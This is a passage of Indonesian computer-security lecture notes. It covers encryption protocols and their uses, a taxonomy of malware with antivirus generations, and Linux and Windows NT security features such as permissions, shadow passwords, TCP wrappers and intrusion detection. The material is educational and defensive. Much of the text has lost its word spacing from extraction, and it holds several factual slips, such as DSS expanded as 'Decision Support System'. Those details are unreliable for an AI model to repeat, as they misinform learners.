dapatmenanganimultipleplatform/system freecharge(opensource) IBMmenyediakanversikomersial:GlobalSignOn(GSO)

6. PointtopointTunnelingProtocol(PPTP),LayerTwoTunnelingProtocol(L2TP) dirancangolehMicrosoft autenticationberdasarkanPPP(Pointtopointprotocol) enkripsiberdasarkanalgoritmMicrosoft(tidakterbuka) terintegrasidenganNOSMicrosoft(NT,2000,XP) 7. RemoteAccessDialinUserService(RADIUS) multipleremoteaccessdevicemenggunakan1databaseuntukauthentication didukungoleh3com,CISCO,Ascend tidakmenggunakanencryption 8. RSAEncryption dirancangolehRivest,Shamir,Adlemantahun1977 standardefactodalamenkripsipublic/privatekey didukungolehMicrosoft,apple,novell,sun,lotus mendukungprosesauthentication multiplatform 9. SecureHashAlgoritm(SHA) dirancangolehNationalInstituteofStandardandTechnology(NIST)USA. bagiandaristandarDSS(DecisionSupportSystem)USAdanbekerjasama denganDESuntukdigitalsignature. SHA1menyediakan160bitmessagedigest Versi:SHA256,SHA384,SHA512(terintegrasidenganAES) 10. MD5 dirancangolehProf.RobertRivest(RSA,MIT)tahun1991 menghasilkan128bitdigest. cepattapikurangaman 11. SecureShell(SSH) digunakanuntukclientsideauthenticationantara2sistem mendukungUNIX,windows,OS/2 melindungitelnetdanftp(filetransferprotocol) 12. SecureSocketLayer(SSL) dirancangolehNetscape menyediakanenkripsiRSApadalayessessiondarimodelOSI. independenterhadapserviseyangdigunakan. melindungisystemsecurewebecommerce metodepublic/privatekeydandapatmelakukanauthentication terintegrasidalamprodukbrowserdanwebserverNetscape. 13. SecurityToken aplikasipenyimpananpassworddandatauserdismartcard 14. SimpleKeyManagementforInternetProtocol sepertiSSLbekerjapadalevelsessionmodelOSI. menghasilkankeyyangstatic,mudahbobol.

Hal:16

KeamananKomputer
APLIKASIENKRIPSI

Beberapaaplikasiyangmemerlukanenkripsiuntukpengamanandataataukomunikasi diantaranyaadalah: a.Jasatelekomunikasi Enkripsiuntukmengamankaninformasikonfidensialbaikberupasuara, data,maupungambaryangakandikirimkankelawanbicaranya. Enkripsipadatransferdatauntukkeperluanmanajemenjaringandan transferonlinedatabilling. Enkripsiuntukmenjagacopyrightdariinformasiyangdiberikan. b.Militerdanpemerintahan Enkripsidiantaranyadigunakandalampengirimanpesan. Menyimpandatadatarahasiamiliterdankenegaraandalammedia penyimpanannyaselaludalamkeaadanterenkripsi. c.DataPerbankan Informasitransferuangantarbankharusselaludalamkeadaanterenkripsi d.Datakonfidensialperusahaan Rencanastrategis,formulaformulaproduk,databasepelanggan/karyawan dandatabaseoperasional pusatpenyimpanandataperusahaandapatdiaksessecaraonline. Teknikenkripsijugaharusditerapkanuntukdatakonfidensialuntuk melindungidatadaripembacaanmaupunperubahansecaratidaksah. e.Pengamananelectronicmail Mengamankanpadasaatditransmisikanmaupundalammedia penyimpanan. Aplikasienkripsitelahdibuatkhususuntukmengamankanemail, diantaranyaPEM(PrivacyEnhancedMail)danPGP(PrettyGoodPrivacy), keduanyaberbasisDESdanRSA. f.KartuPlastik EnkripsipadaSIMCard,kartuteleponumum,kartulanggananTVkabel, kartukontrolaksesruangandankomputer,kartukredit,kartuATM,kartu pemeriksaanmedis,dll Enkripsiteknologipenyimpanandatasecaramagnetic,optik,maupunchip.

Hal:17

KeamananKomputer

KEAMANANDARIDEVILPROGRAM

Taksonomiancamanperangkatlunak/klasifikasiprogramjahat(maliciousprogram): 1. Programprogram yang memerlukan program inang (host program). Fragmen program tidak dapat mandiri secara independen dari suatu program aplikasi, program utilitas atauprogramsistem. 2. Programprogram yang tidak memerlukan program inang. Program sendiri yang dapat dijadwalkandandijalankanolehsistemoperasi. Tipetipeprogramjahat: 1. Bacteria : program yang mengkonsumsi sumber daya sistem dengan mereplikasi dirinya sendiri. Bacteria tidak secara eksplisit merusak file. Tujuan program ini hanya satu yaitu mereplikasi dirinya. Program bacteria yang sederhana bisa hanya mengeksekusi dua kopian dirinya secara simultan pada sistem multiprogramming atau menciptakan dua file baru, masingmasing adalah kopian file program bacteria. Kedua kopianinkemudianmengkopiduakali,danseterusnya. 2. Logic bomb : logik yang ditempelkan pada program komputer agar memeriksa suatu kumpulan kondisi di sistem. Ketika kondisikondisi yang dimaksud ditemui, logik mengeksekusisuatufungsiyangmenghasilkanaksiaksitakdiotorisasi. Logic bomb menempel pada suatu program resmi yang diset meledak ketika kondisikondisitertentudipenuhi. Contoh kondisikondisi untuk memicu logic bomb adalah ada atau tudak adanya filefile tertentu, hari tertentu daru minggu atau tanggal, atau pemakai menjalankan aplikasi tertentu. Begitu terpicu, bomb mengubah atau menghapus data atau seluruh file, menyebabkan mesin terhenti, atau mengerjakan perusakan lain. 3. Trapdoor:Titikmasuktakterdokumentasirahasiadisatuprogramuntukmemberikan aksestanpametodemetodeotentifikasinormal. Trapdoortelahdipakaisecarabenarselamabertahuntahunolehpemogramuntuk mencari kesalahan program. Debugging dan testing biasanya dilakukan pemogram saat mengembangkan aplikasi. Untuk program yang mempunyai prosedur otentifikasi atau setup lama atau memerlukan pemakai memasukkan nilainilai berbeda untuk menjalankan aplikasi maka debugging akan lama bila harus melewati prosedurprosedur tersebut. Untuk debug program jenis ini, pengembang membuat kewenangan khusus atau menghilangkan keperluan setup danotentifikasi. Trapdoor adalah kode yang menerima suatu barisan masukan khusus atau dipicu dengan menjalankan ID pemakai tertentu atau barisan kejahatan tertentu. Trapdoormenjadiancamanketikadigunakanpemrogramjahatuntukmemperoleh pengkasesantakdiotorisasi. Padakasusnyata,auditor (pemeriks)perangkatlunakdapat menemukantrapdoor pada produk perangkat lunak dimana nama pencipta perangkat lunak berlakuk sebagaipasswordyangmemintasproteksiperangkatlunakyangdibuatnya.Adalah sulitmengimplementasikankendalikendaliperangkatlunakuntuktrapdoor. 4. Trojan horse : Rutin tak terdokumentasi rahasia ditempelkan dalam satu program berguna. Program yang berguna mengandung kode tersembunyi yang ketika dijalankan melakukan suatu fungsi yang tak diinginkan. Eksekusi program menyebabkaneksekusirutinrahasiaini.

Hal:18

KeamananKomputer

Programprogram trojan horse digunakan untuk melakukan fungsifungsi secara tidak langsung dimana pemakai tak diotorisasi tidak dapat melakukannya secara langsung. Contoh, untuk dapat mengakses filefile pemakai lain pada sistem dipakaibersama,pemakaidapatmenciptakanprogramtrojanhorse. Trojanhorseiniketikaprogramdieksekusiakanmengubahijinijinfilesehingafile file dapat dibaca oleh sembarang pemakai. Pencipta program dapat menyebarkan ke pemakaipemakai dengan menempatkan program di direktori bersama dan menamai programnya sedemikian rupa sehingga disangka sebagai program utilitas yangberguna. Program trojan horse yang sulit dideteksi adalah kompilator yang dimodifikasi sehingga menyisipkan kode tambahan ke programprogram tertentu begitu dikompilasi, seperti program login. Kode menciptakan trapdoor pada program login yang mengijinkan pencipta log ke sistem menggunakan password khusus. Trojan horse jenis ini tak pernah dapat ditemukan jika hanya membaca program sumber. Motivasi lain dari trojan horse adalah penghancuran data. Program muncul sebagai melakukan fungsifungsi berguna (seperti kalkulator), tapi juga secaradiamdiammenghapusfilefilepemakai. Trojan horse biasa ditempelkan pada programprogram atau rutinrutin yang diambildariBBS,internet,dansebagainya.

5. Virus : Kode yang ditempelkan dalam satu program yang menyebabkan pengkopian dirinya disisipkan ke satu program lain atau lebih, dengan cara memodifikasi program programitu. Modifikasi dilakukan dengan memasukkan kopian program virus yang dapat menginfeksiprogramprogramlain.Selainhanyaprogasi,virusbiasanyamelakukan fungsiyangtakdiinginkan. Di dalam virus komputer, terdapat kode intruksi yang dapat membuat kopian sempurna dirinya. Ketika komputer yang terinfeksi berhubungan (kontak) dengan perangkat lunak yang belum terinfeksi, kopian virus memasuki program baru. Infeksi dapat menyebar dari komputer ke komputer melalui pemakaipemakai yang menukarkan disk atau mengirim program melalui jaringan. Pada lingkungan jaringan, kemampuan mengakses aplikasi dan layananlayanan komputer lain merupakanfasilitassempurnapenyebaranvirus. Masalah yang ditimbulkan virus adalah virus sering merusak sistem komputer sepertimenghapusfile,partisidisk,ataumengacaukanprogram. SiklushidupVirusmelaluiempatfase(tahap),yaitu: Fase tidur (dormant phase). Virus dalam keadaan menganggur. Virus akan tibatiba aktif oleh suatu kejadian seperti tibanya tanggal tertentu, kehadiran program atau file tertentu, atau kapasitas disk yang melewati batas.Tidaksemuavirusmempunyaitahapini. Fase propagasi (propagation phase). Virus menempatkan kopian dirinya ke program lain atau daerah sistem tertentu di disk. Program yang terinfeksi virus akan mempunyai kloning virus. Kloning virus itu dapat kembali memasukifasepropagasi. Fase pemicuan (triggering phase). Virus diaktifkan untuk melakukan fungsi tertentu. Seperti pada fase tidur, fase pemicuan dapat disebabkan beragam kejadiansistemtermasukpenghitunganjumlahkopiandirinya. Fase eksekusi (execution phase). Virus menjalankan fungsinya, fungsinya mungkin sepele seperti sekedar menampilkan pesan dilayar atau merusak seperti merusak program dan filefile data, dan sebagainya. Kebanyakan virus melakukan kerjanya untuk suatu sistem operasi tertentu, lebih spesifik lagi pada platform perangkat keras tertentu. Virusvirus dirancang memanfaatkanrincianrinciandankelemahankelemahansistemtertentu.

Hal:19

KeamananKomputer

Klasifikasitipevirus: a. Parasitic virus. Merupakan virus tradisional dan bentuk virus yang paling sering. Tipe ini mencantolkan dirinya ke file .exe. Virus mereplikasi ketika programterinfeksidieksekusidenganmencarifilefile.exelainuntukdiinfeksi. b. Memory resident virus. Virus memuatkan diri ke memori utama sebagai bagian program yang menetap. Virus menginfeksi setiap program yang dieksekusi. c. Boot sector virus. Virus menginfeksi master boot record atau boot record dan menyebarsaatsistemdibootdaridiskyangberisivirus. d. Stealth virus. Virus yang bentuknya telah dirancang agar dapat menyembunyikandiridarideteksiperangkatlunakantivirus. e. Polymorphic virus. Virus bermutasi setiap kali melakukan infeksi. Deteksi dengan penandaan virus tersebut tidak dimungkinkan. Penulis virus dapat melengkapi dengan alatalat bantu penciptaan virus baru (virus creation toolkit, yaitu rutinrutin untuk menciptakan virusvirus baru). Dengan alat bantuinipenciptaanvirusbarudapatdilakukandengancepat.Virusvirusyang diciptakan dengan alat bantu biasanya kurang canggih dibanding virusvirus yangdirancangdariawal.

6. Worm : Program yang dapat mereplikasi dirinya dan mengirim kopiankopian dari komputer ke komputer lewat hubungan jaringan. Begitu tiba, worm diaktifkan untuk mereplikasi dan progasai kembali. Selain hanya propagasi, worm biasanya melakukan fungsiyangtakdiinginkan. Network worm menggunakan hubungan jaringan untuk menyebar dari sistem ke sistem lain. Sekali aktif di suatu sistem, network worm dapat berlaku seperti virus atau bacteria, atau menempelkan program trojan horse atau melakukan sejumlah aksimenjengkelkanataumenghancurkan. Untuk mereplikasi dirinya, network worm menggunakan suatu layanan jaringan, seperti:Fasilitassuratelektronik(electronicmailfacility),yaituwormmengirimkan kopiandirinyakesistemsistemlain. Kemampuan eksekusi jarak jauh (remote execution capability), yaitu worm mengeksekusikopiandirinyadisistemlain. Kemampuan login jarak jauh (remote login capability), yaitu worm log pada sistem jauh sebagai pemakai dan kemudian menggunakan perintah untuk mengkopi dirinya dari satu sistem ke sistem lain. Kopian program worm yang baru kemudian dijalankandisistemjauhdanmelakukanfungsifungsilainyangdilakukandisistem itu,wormterusmenyebardengancarayangsama. Network worm mempunyai ciriciri yang sama dengan virus komputer, yaitu mempunyai fasefase sama, yaitu :Dormant phase, Propagation phase, Trigerring phase,Executionphase. Network worm juga berusaha menentukan apakah sistem sebelumnya telah diinfeksisebelummengirimkopiandirinyakesistemitu. Antivirus Solusi ideal terhadap ancaman virus adalah pencegahan. Jaringan diijinkan virus masuk ke sistem. Sasaran ini, tak mungkin dilaksanakan sepenuhnya. Pencegahan dapat mereduksi sejumlah serangan virus. Setelah pencegahan terhadap masuknya virus, maka pendekatan berikutnyayangdapatdilakukanadalah: 1. Deteksi.Begituinfeksitelahterjadi,tentukanapakahinfeksimemangtelahterjadidan carilokasivirus. 2. Identifikasi.Begituvirusterdeteksimakaidentifikasivirusyangmenginfeksiprogram.

Hal:20

KeamananKomputer
3. Penghilangan. Begitu virus dapat diidentifikasi maka hilangkan semua jejak virus dari programyangterinfeksidanprogramdikembalikankesemua(sebelumterinfeksi).Jika deteksi virus sukses dilakukan, tapi identifikasi atau penghilangan jejak tidak dapat dilakukan, maka alternatif yang dilakukan adalah menghapus program yang terinfeksi dankopikembalibackupprogramyangmasihbersih. Perkembanganprogramantivirusdapatdiperiodemenjadiempatgenerasi,yaitu: 1. Generasi pertama : sekedar scanner sederhana. Antivirus menscan program untuk menemukan penanda (signature) virus. Walaupun virus mungkin berisi karakter karakter varian, tapi secara esensi mempunyai struktur dan pola bit yang sama di semua kopiannya. Teknis ini terbatas untuk deteksi virusvirus yang telah dikenal. Tipe lain antivirus generasi pertama adalah mengelola rekaman panjang (ukuran) program danmemeriksaperubahanpanjangprogram. 2. Generasi kedua : scanner yang pintar (heuristic scanner). Antivirus menscan tidak bergantung pada penanda spesifik. Antivirus menggunakan aturanaturan pintar (heuristicrules)untukmencarikemungkinaninfeksivirus.Teknikyangdipakaimisalnya mencari fragmen fragmen kode yang sering merupakan bagian virus. Contohnya, antivirus mencari awal loop enkripsi yang digunakan polymorphic virus dan menemukankuncienkripsi.Begitukunciditemukan,antivirusdapatmendeskripsivirus untuk identifikasi dan kemudian menghilangkan infeksi virus. Teknik ini adalah pemeriksanaan integritas. Checksum dapat ditambahkan di tiap program. Jika virus menginfeksi program tanpa mengubah checksum, maka pemeriksaan integritas akan menemukan perubahan itu. Untuk menanggulangi virus canggih yang mampu mengubah checksum saat menginfeksi program, fungsi hash terenkripsi digunakan. Kunci enkripsi disimpan secara terpisah dari program sehingga program tidak dapat menghasilkan kode hash baru dan mengenkripsinya. Dengan menggunakan fungsi hash bukan checksum sederhana maka mencegah virus menyesuaikan program yang menghasilkankodehashyangsamasepertisebelumnya. 3. Generasi ketiga : jebakanjebakan aktivitas (activity trap). Program antivirus merupakan program yang menetap di memori (memory resident program). Program ini mengidentifikasi virus melalui aksi aksinya bukan dari struktur program yang diinfeksi. Dengan antivirus semacam in tak perlu mengembangkan penandapenanda dan aturanaturan pintar untuk beragam virus yang sangat banyak. Dengan cara ini yang diperlukan adalah mengidentifikasi kumpulan instruksi yang berjumlah sedikit yang mengidentifikasi adanya usaha infeksi. Kalau muncul kejadian ini, program antivirussegeramengintervensi. 4. Generasi keempat : proteksi penuh (full featured protection). Antivirus generasi ini menggunakan beragam teknik antivirus secara bersamaan. Teknikteknik ini meliputi scanning dan jebakanjebakan aktivitas. Antivirus juga mempunyai senarai kapabilitas pengaksesan yang membatasi kemampuan virus memasuki sistem dan membatasi kemampuan virus memodifikasi file untuk menginfeksi file. Pertempuran antara penulis virus dan pembuat antivirus masih berlanjut. Walau beragam strategi lebih lengkap telah dibuat untuk menanggulangi virus, penulis virus pun masih berlanjut menulis virus yang dapat melewati barikadebarikade yang dibuat penulis antivirus. Untuk pengaman sistem komputer, sebaiknya pengaksesandan pemakaian komputer diawasidenganseksamasehinggatidakmenjalankanprogramataumemakaidiskyang belum terjamin kebersihannya dari infeksi virus. Pencegahan terbaik terhadap ancamanvirusadalahmencegahvirusmemasukisistemdisaatyangpertama.

Hal:21

KeamananKomputer

KEAMANANSISTEMOPERASI

Linux
KomponenArsitekturKeamananLinux: 1. AccountPemakai(useraccount) Keuntungan: Kekuasaandalamsatuaccountyaituroot,sehinggamudahdalamadministrasisystem. Kecerobohansalahsatuusertidakberpengaruhkepadasystemsecarakeseluruhan. Masingmasingusermemilikiprivacyyangketat MacamUser: Root : kontrolsystemfile,user,sumberdaya(devices)danaksesjaringan User : accountdengankekuasaanyangdiaturolehrootdalammelakukanaktifitasdalam system. Group : kumpulanuseryangmemilikihaksharingyangsejenisterhadapsuatudevices tertentu. 2. KontrolAksessecaraDiskresi(DiscretionaryAccesscontrol) DiscretionaryAccesscontrol(DAC)adalahmetodepembatasanyangketat,yangmeliputi: Setiapaccountmemilikiusernamedanpasswordsendiri. Setiapfile/devicememilikiatribut(read/write/execution)kepemilikan,group,danuser umum. Virus tidak akan mencapai file system, jika sebuah user terkena, maka akan berpengaruh pada file-file yang dimiliki oleh user yang mengeksekusi file tersebut. Jikakitalakukanlistsecaradetailmenggunakan$lsl,kitadapatmelihatpenerapanDACpada filesystemlinux:
drwx5fadeusers1024Feb812:30Desktop rwrr9Gohhack318Mar3009:05borg.dead.letter

rw r 1 2 3 Keterangan: r 4 9 Goh hack 5 6 7 318 Mar 30 09:05 borg.dead.letter 8 9 10 11

5= 6= 7= 8= 9= 10= 11= Jumlahlinkfile Namapemilik(owner) NamaGroup Besarfiledalambyte Bulandantanggalupdateterakhir Waktuupdateterakhir Namafile/device

1= tipedarifile;tandadash()berarti filebiasa,dberartidirectory,lberarti filelink,dsb 2= Izinaksesuntukowner(pemilik), r=read/baca,w=write/tulis, x=execute/eksekusi 3= Izinaksesuntukgroup 4= Izinaksesuntukother(userlainyang beradadiluargroupyang didefinisikansebelumnya)

Hal:22

KeamananKomputer
PerintahperintahpentingpadaDAC: Mengubahizinaksesfile: 1. bu:chmod<u|g|o><+|><r|w|e>namafile, contoh: chmodu+xg+worborg.dead.letter;tambahkanakseseksekusi(e)untukuser(u), tambahkanjugaakseswrite(w)untukgroup(g)dankurangiizinaksesread(r)untuk other(o)user. 2. chmodmetodeoctal,bu:chmodnamafile,digitdash()pertamauntukizinakses user,digitke2untukizinaksesgroupdandigitke3untukizinaksesother,berlaku ketentuan:r(read)=4,w(write)=2,x(execute)=1dantanpaizinakses=0. Contoh: Chmod740borg.dead.letter Berarti:bagifileborg.dead.letterberlaku digitke17=4+2+1=izinaksesr,w,xpenuhuntukuser. digitke24=4+0+0=izinaksesruntukgroup digitke30=0+0+0=tanpaizinaksesuntukotheruser. Mengubahkepemilikan:chown<owner/pemilik><namafile> Mengubahkepemilikangroup:chgrp<groupowner><namafile> Menggunakanaccountrootuntuksementara: ~$su ;systemakanmemintapassword password:**** ;promptakanberubahjadipagar,tandaloginsebagairoot ~# Mengaktifkanshadowpassword,yaitumembuatfile/etc/passwdmenjadidapatdibaca (readable)tetapitidaklagiberisipassword,karenasudahdipindahkanke/etc/shadow Contohtipikalfile/etc/passwdsetelahdiaktifkanshadow:
root:x:0:0::/root:/bin/bash fade:x:1000:103:,,,:/home/fade:/bin/bash

Lihatuserfade,dapatkitabacasebagaiberikut: username :fade Password :x UserID(UID) :1000 GroupID(GUID) :103 Keterangantambahan : Homedirectory :/home/fade Shelldefault :/bin/bash Passwordnyabisadibaca(readable),tapiberupahurufxsaja,passwordsebenarnyadisimpan difile/etc/shadowdalamkeadaandienkripsi:
root:pCfouljTBTX7o:10995:0::::: fade:oiHQw6GBf4tiE:10995:0:99999:7:::

PerlunyaProaktifpassword

Hal:23

KeamananKomputer
LinuxmenggunakanmetodeDES(DataEncriptionStandart)untukpasswordnya.Userharusdi training dalam memilih password yang akan digunakannya agar tidak mudah ditebak dengan programprogramcrackpassworddalamancamanbrutoforceattack.Danperlupuladitambah denganprogramBantucekkeamananpasswordseperti: Passwd+ : meningkatkan loging dan mengingatkan user jika mengisi password yang mudahditebak,ftp://ftp.dartmouth.edu/pub/security Anlpasswd : dapat membuat aturan standar pengisian password seperti batas minimum, gabungan huruf besar dengan huruf kecil, gabungan angka dan huruf dsb, ftp://coast.rs.purdue.edu/pub/tools/unix/ 3. Kontrolaksesjaringan(NetworkAccessControl) Firewalllinux 1 : alat pengontrolan akses antar jaringan yang membuat linux dapat memilih host yang berhak / tidakberhakmengaksesnya. FungsiFirewalllinux: Analisadanfilteringpaket Memeriksa paket TCP, lalu diperlakukan dengan kondisi yang sudah ditentukan, contoh paketAlakukantindakanB. Blockingcontentdanprotocol Blokingisipaketsepertiappletjava,activeX,Vbscript,Cookies Autentikasikoneksidanenkripsi Menjalankan enkripsi dalam identitas user, integritas satu session dan melapisi data denganalgoritmaenkripsiseperti:DES,tripleDES,Blowfish,IPSec,SHA,MD5,IDEA,dsb. Tipefirewalllinux: Applicationproxyfirewall/ApplicationGateways Dilakukan pada level aplikasi di layer OSI, system proxy ini meneruskan / membagi paket paketkedalamjaringaninternal.Contoh:softwareTISFWTK(TurstedInformationSystem FirewallToolkit) Network level Firewall, fungsi filter dan bloking paket dilakukan di router. Contoh : TCPWrappers,aplikasinyaadadi/usr/sbin/tcpd.Carakerjanya: Lihatisifile/etc/inetd.conf:
... telnet shell pop3 stream stream stream tcp nowait tcp nowait tcp nowait root/usr/sbin/telnetd root/usr/sbin/rshd root/usr/sbin/pop3d

dengandiaktifkanTCPwrappersmakaisifile/etc/inetd.conf:
... telnet shell pop3 stream stream stream tcp nowait tcp nowait tcp nowait root/usr/sbin/tcpdin.telnetd root/usr/sbin/tcpdin.rshdL root/usr/sbin/tcpdin.pop3d

setiap ada permintaan layanan jarak jauh, dipotong dulu dengan pencocokan rule set yang telahdiaturolehtcpin,jikamemenuhisyaratditeruskankefileyangakandiekseskusi,tapi jikatidakmemenuhisyaratdigagalkan.
1

Untuk membedakan firewall yang built-in di linux dengan firewall dedicated yang banyak digunakan dalam teknologi jaringan, maka digunakan istilah firewall linux.

Hal:24

KeamananKomputer
PengaturanTCPWrapperdilakukandenganmengkonfigurasi2file,yaitu: /etc/host.allowhostyangdiperbolehkanmengakses. /etc/host.denyhostyangtidakdiperbolehkanmengakses. 4. Enkripsi(encryption) PenerapanEnkripsidilinux: EnkripsipasswordmenggunakanDES(DataEncryptionStandard) Enkripsikomunikasidata: 1. SecureShell(SSH)Programyangmelakukanlogingterhadapkomputerlaindalam jaringan,mengeksekusiperintahlewatmesinsecararemotedanmemindahkanfile darisatumesinkemesinlainnya.EnkripsidalambentukBlowfish,IDEA,RSA,Triple DES.IsiSSHSuite: scp(secureshellcopy)mengamankanpenggandaandata ssh(secureshellclient)modelclientsshsepertitelnetterenkripsi. sshagentotentikasilewatjaringandenganmodelRSA. sshd(secureshellserver)diport22 sshkeygenpembuatkunci(keygenerator)untukssh Konfigurasidilakukandi: /etc/sshd_config(filekonfigurasiserver) /etc/ssh_config(filekonfigurasiclient) 2. SecuresocketLayer(SSL)mengenkripsidatayangdikirimkanlewatporthttp. Konfigurasidilakukandi:webserverAPACHEdenganditambahPATCHSSL. 5. Logging Def:ProsedurdariSistemOperasiatauaplikasimerekamsetiapkejadiandanmenyimpan rekamantersebutuntukdapatdianalisa. Semuafileloglinuxdisimpandidirectory/var/log,antaralain: Lastlog:rekamanuserloginterakhirkali last:rekamanuseryangpernahlogindenganmencarinyapadafile/var/log/wtmp xferlog : rekaman informasi login di ftp daemon berupa data wktu akses, durasi transfer file, ip dan dns host yang mengakses, jumlah/nama file, tipe transfer(binary/ASCII), arah transfer(incoming/outgoing), modus akses(anonymous/guest/user resmi), nama/id/layananuserdanmetodeotentikasi. Access_log:rekamanlayananhttp/webserver. Error_log:rekamanpesankesalahanatasservicehttp/webserverberupadatajamdan waktu,tipe/alasankesalahan Messages:rekamankejadianpadakernelditanganiolehduadaemon: o Syslogmerekamsemuaprogramyangdijalankan,konfigurasipadasyslog.conf o Klogmenerimadanmerekamsemuapesankernel 6. DeteksiPenyusupan(IntrusionDetection) Def:aktivitasmendeteksipenyusupansecaracepatdenganmenggunakanprogramkhusus secaraotomatisyangdisebutIntrusionDetectionSystem TipedasarIDS:

Hal:25

KeamananKomputer

Ruledbasedsystem:mencatatlalulintasdatajikasesuaidengandatabasedaritanda penyusupanyangtelahdikenal,makalangsungdikategorikanpenyusupan.Pendekatan Ruledbasedsystem: o Preemptory(pencegahan);IDSakanmemperhatikansemualalulintasjaringan,dan langsungbertindakjikadicurigaiadapenyusupan. o Reactionary(reaksi);IDShanyamengamatifilelogsaja. Adaptivesystem:penerapanexpertsystemdalammengamatilalulintasjaringan.

ProgramIDS: Chkwtmp:programpengecekanterhadapentrykosong Tcplogd:programpendeteksistealthscan(scanningyangdilakukantanpamembuat sesitcp) Hostentry:programpendeteksiloginanomaly(perilakuaneh)bizarrebehaviour (perilakuaneh),timeanomalies(anomalywaktu),localanomaly.

WindowsNT
KomponenArsitekturKeamananNT: 1.AdminisrasiUserdanGroup JenisAccountUser: Administrator Guest User JenisAccountGorup: Administrator Guest User Operatorbackup Poweruser Operatorserver Operatoraccount Operatorprinter HakUser/Grup: Hakbasic:accescomputerfromnetwork,backupfiles/directory,changesystemtime, logonlocally,manageauditingandsecurity,log(eventviewer),restorefilesanddirectory, shutdownsystem,takeownershipfilesorotherobject,dll. Hakadvance:accessserviceandkerneluntukkebutuhanpengembangansystem. 2.KeamananuntuksystemFile A.NTFS: Cepatdalamoperasistandarfile(readwritesearch) Terdapatsystemfilerecovery,accesscontroldanpermission. Memandangobyeksebagaikumpulanatribut,termasukpermissionaccess. B.Proteksiuntukintegritasdata

Hal:26

KeamananKomputer
Transaction logging : merupakan system file yang dapat direcovery untuk dapat mencatat semuaperubahanterakhirpadadirectorydanfilesecaraotomatis. JikatransaksisystemberhasilNTakanmelakukanpembaharuanpadafile. Jikatransaksigagal,NTakanmelalui: Tahap analisis : mengukur kerusakan dan menentukan lokasi cluster yang harus diperbaruiperinformasidalamfilelog. Tahap redo : melakukan semua tahapan transaksi yang dicatat pada titik periksa terakhir Tahap undo : mengembalikan ke kondisi semula untuk semua transaksi yang belum selesaidikerjakan. Sector sparing : Teknik dynamic data recovery yang hanya terdapat pada disk SCSI dengan cara memanfaatkan teknologi faulttolerant volume untuk membuat duplikat data dari sector yangmengalamierror.Metodenyaadalahdenganmerekalkulasidaristripesetwithparityatau denganmembacasectordarimirrordrivedanmenulisdatatersebutkesektorbaru. Cluster remapping : Jika ada kegagalan dalam transaksi I/O pada disk , secara otomatis akan mencari cluster baru yang tidak rusak, lalu menandai alamat cluster yang mengandung bad sectortersebut. C.Faulttolerance:Kemampuanuntukmenyediakanredudansidatasecararealtimeyangakan memberikan tindakanpenyelamatanbilaterjadikegagalanperangkatkeras,korupsiperangkat lunakdankemungkinanmasalahlainnya. Teknologinya disebut RAID (Redudant Arrays of inexpensive Disk) : sebuah array disk dimana dalam sebuah media penyimpanan terdapat informasi redudan tentang data yang disimpan di sisamediatersebut. KelebihanRAID: MeningkatkankinerjaI/O meningkatkanreabilitasmediapenyimpanan Ada2bentukfaulttolerance: 1. Diskmirroring(RAID1):meliputipenulisandatasecarasimultankeduamedia penyimpananyangsecarafisikterpisah. 2. Disk stripping dengan Parity (RAID 5) : data ditulis dalam stripstrip lewat satu array disk yang didalam stripstrip tersebut terdapat informasi parity yang dapat digunakan untuk meregenerasidataapabilasalahsatudiskdevicedalamstripsetmengalamikegagalan. 3.ModelKeamananWindowsNT Dibuat dari beberapa komponen yang bekerja secara bersamasama untuk memberikan keamananlogondanaccesscontrollist(ACL)dalamNT: LSA (Local security Authority) : menjamin user memiliki hak untuk mengakses system. Inti keamananyangmenciptakanaksestoken,mengadministrasikebijakankeamananlocaldan memberikanlayananotentikasiuser. Proses logon : menerima permintaan logon dari user (logon interaktif dan logon remote), menantimasukanusernamedanpasswordyangbenar.DibantuolehNetlogonservice. Security Account Manager (SAM) : dikenal juga sebagai directory service database, yang memeliharadatabaseuntukaccountuserdanmemberikanlayanvalidasiuntukprosesLSA. SecurityReferenceMonitor(SRM):memeriksastatusizinuserdalammengakses,danhak useruntukmemanipulasiobyeksertamembuatpesanpesanaudit.

Hal:27

KeamananKomputer
4.KeamananSumberdayalokal ObyekdalamNT[file,folder(directory),proses,thread,sharedandevice],masingmasing akandilengkapidenganObyekSecurityDescriptoryangterdiridari: SecurityIDOwner:menunjukkanuser/grupyangmemilikiobyektersebut,yangmemiliki kekuasaanuntukmengubahaksespermissionterhadapobyektersebut. SecurityIDgroup:digunakanolehsubsistemPOSIXsaja. DiscretionaryACL(AccessControlList):identifikasiuserdangrupyangdiperbolehkan/ ditolakdalammengakses,dikendalikanolehpemilikobyek. SystemACL:mengendalikanpesanauditingyangdibangkitkanolehsystem,dikendalikan olehadministratorkeamananjaringan. 5.KeamananJaringan JenisKeamananJaringanWindowsNT: Model keamanan user level : account user akan mendapatkan akses untuk pemakaian bersamadenganmenciptakanshareatasdirectoryatauprinter. o Keunggulan : kemampuan untuk memberikan user tertentu akses ke sumberdaya yangdisharedanmenentukanjenisaksesapayangdiberikan. o Kelemahan : proses setup yang kompleks karena administrator harus memberitahu setiap user dan menjaga policy system keamanan tetap dapat dibawah kendalinya denganbaik. Model keamanan Share level : dikaitkan dengan jaringan peer to peer, dimana user manapun membagi sumber daya dan memutuskan apakaha diperlukan password untuk suatuaksestertentu. o Keuntungan : kesederhanaannya yang membuat keamanan sharelevel tidak membutuhkanaccountuseruntukmendapatkanakses. o Kelemahan : sekali izin akses / password diberikan, tidak ada kendali atas siap yang menaksessumberdaya. CaraNTmenanganikeamananjaringan: 1. Memberikanpermission: PermissionNTFSlocal Permissionshere 2. KeamananRAS(RemoteAccessServer) Melakukanremoteaccessusermenggunakandialup: Otentikasiusernamedanpasswordyangvaliddengandialinpermission. Callbacksecurity:pengecekannomorteleponyangvalid. Auditing : menggunakan auditing trails untuk melacak ke/dari siapa, kapan usermemilikiakseskeserverdansumberdayaapayangdiakses. 3. PengamananLayananinternet: FirewallterbataspadaInternetInformationserver(IIS). MenginstaltambahanproxysepertiMicrosoftProxyserver. 4. Share administrative :memungkin administrator mendapatkan akses ke server windowsNTatauworkstationmelaluijaringan 6.Keamananpadaprinter Dilakukandenganmensettingpropertiesprinter: 1. Menentukanpermission:fullcontrol,Managedocument,print 2. BiasanyasusunanpermissionpadaNTdefaulut: Adminstratorfullcontrol

Hal:28

KeamananKomputer
